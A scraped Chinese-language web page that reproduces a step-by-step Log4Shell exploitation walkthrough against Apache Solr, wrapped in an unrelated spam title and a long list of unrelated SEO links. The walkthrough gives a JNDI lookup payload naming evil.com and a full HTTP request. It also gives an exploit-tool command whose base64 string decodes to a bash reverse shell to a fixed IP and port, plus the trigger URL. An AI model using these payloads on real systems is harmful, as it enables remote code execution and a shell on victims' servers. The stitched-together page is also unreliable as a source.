当前位置: 首页 > news >正文

私人让做彩票网站吗网络营销师报考条件

私人让做彩票网站吗,网络营销师报考条件,中企动力做网站的价格,门户网站优化方案Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

http://www.tj-hxxt.cn/news/67189.html

相关文章:

  • 网龙沧州网站制作shopify seo
  • 济南网站建设泉诺宁波网站推广公司有哪些
  • 四川省建设厅职称查询网站公司怎么做网络营销
  • 微信公众号做特效的网站宣传推广
  • 在国外社交网站做产品推广营销软文800字范文
  • wordpress 一键建站营销型网站建设需要多少钱
  • 免费微信网站建设网络营销的好处
  • 贵州省建设执业资格教育促进会网站河北百度推广seo
  • 网站建设框架百度一下你就知道原版
  • 怎么做狼视听网站seo是什么技术
  • 鄂州人民政府网站seo管理工具
  • 怎么做pc端移动网站好看的网页设计作品
  • b站做简介的网站营销和运营的区别是什么
  • 企业网站维护建设ppt百度seo详解
  • 报名网站建设百度竞价的优势和劣势
  • 以前做的网站怎么才能登陆后台百度一下首页设为主页
  • 网站 设计 工具网络推广项目外包公司
  • jsp网站建设毕业设计建设网官方网站
  • 金耀网站建设网站制作怎样做企业推广
  • wordpress响应速度太慢长春seo顾问
  • 橙色可以做哪些网站如何创建微信小程序
  • 控制网站的大量访问网络推广有多少种方法
  • 企业网站建设排名网址app推广员好做吗
  • 日本药妆电子商务网站建设规划书网易搜索引擎入口
  • 做网站公司的排名网络营销实施方案
  • 微信扫一扫登录网站如何做永久免费的培训学校管理软件
  • 成考报名系统入口官网网站优化服务
  • 王建设医生个人网站近一周的新闻大事热点
  • 深圳网站建设推广培训机构连锁加盟
  • 建设银行网站首页口百度网站ip地址